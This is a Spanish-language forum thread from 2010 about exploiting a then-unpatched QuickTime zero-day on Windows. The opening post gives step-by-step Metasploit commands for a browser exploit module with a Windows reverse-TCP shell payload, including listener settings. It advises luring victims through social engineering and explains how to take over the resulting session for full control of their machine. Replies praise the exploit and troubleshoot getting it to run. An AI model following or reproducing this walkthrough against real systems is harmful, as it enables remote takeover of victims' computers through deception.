Página 1 de 1

[0Day] Explotando con Metasploit el 0-day en QuickTime.

Publicado: 04 Sep 2010, 10:27
por Skillmax
Ruben Santamarta investigador de seguridad, ha sacado a la luz un 0day que afecta a las ultimas versiones de QuickTime en todas las versiones de Windows.

La noticia ha cogido tanta expectación, que los desarrolladores de metasploit han tardado apenas un día en liberar un módulo para su framework.

En la entrada de hoy, se va a presentar en modo prueba de concepto lo sencillo y eficaz que sería realizar un ataque aprovechándonos de dicha vulnerabilidad. Para realizar dicha función vamos a utilizar el framework metasploit en su versión 3.4.2, y la última versión de QuickTime a día de hoy (7.6.7).



Imagen




Una vez iniciado metasploit pasaremos a ejecutar los siguientes comandos:



·use exploit/windows/browser/apple_quicktime_marshaled_punk (Exploit que vamos a utilizar)
·set SRVHOST 192.168.0.162 (IP local donde va a montar el servicio)
·set SRVPORT 80 (Puerto local del servicio)
·set URIPATH juegos (Uri del servicio)
·set payload windows/shell/reverse_tcp (Payload que vamos a utilizar)
·set LHOST 192.168.0.162 (IP donde se conectará la víctima)
·set LPORT 5050 (Puerto local de escucha)
·exploit (Ejecutamos el exploit)


Acto seguido observaremos como metasploit nos monta el servicio en la uri y puerto indicado.


Imagen



Con esto ya tendremos montando nuestro servicio que explota la vulnerabilidad de QuickTime, ahora sólo faltará, mediante ingeniería social, conseguir que alguien se conecte a nuestro servidor.


Imagen



Una vez que esto ha sucedido metasploit nos informará de que se ha creado una nueva sesión con la nueva víctima, en este caso con IP y puerto: 192.168.0.143:1105.


Imagen



Ahora únicamente bastará con pasarnos a la sesión indicada mediante el siguiente comando:

·sessions -i 2

De este modo se nos devolverá una shell reversa de la víctima, obteniendo control total de su máquina.


Imagen




Hasta el momento no existe parche para esta vulnerabilidad, por lo que se recomienda tener cuidado con el uso de QuickTime en Internet.


Fuente original: Securidad Apple

**

Añado yo: El exploit no funciona en Windows 7, bloquea la ejecución del script en internet, y hay un error en vez de set payload/windows/shell/reverse_tcp, debería ser set payload windows/shell/reverse_tcp



Re: [0Day] Explotando con Metasploit el 0-day en QuickTime.

Publicado: 04 Sep 2010, 17:13
por [NIN]
Wow, exelente exploit.

Re: [0Day] Explotando con Metasploit el 0-day en QuickTime.

Publicado: 05 Sep 2010, 22:11
por Skillmax
dapimp escribió:no funciona en windows verdad?
actualize pero me dice que no puede cargar el modulo!

EDITO: ahora lo estoy probando! esque tenia que abrir y cerrar el metasploit
aver si logro hacer algo

EDITO 2: ala hora de quere correrlo me dice esto:

[-] Handler failed to bind to xxx.xx.xx.29:81

y probe con otros puertos pero nada! que sera???

Hay un error en vez de set payload/windows/shell/reverse_tcp, debería ser set payload windows/shell/reverse_tcp, prueba si es ese fallo

Re: [0Day] Explotando con Metasploit el 0-day en QuickTime.

Publicado: 07 Sep 2010, 14:46
por $DoC
wow que bueno! ahora mismo me desinstalo QuickTime gracias Skill muy útil lo que nos traes..

saludos!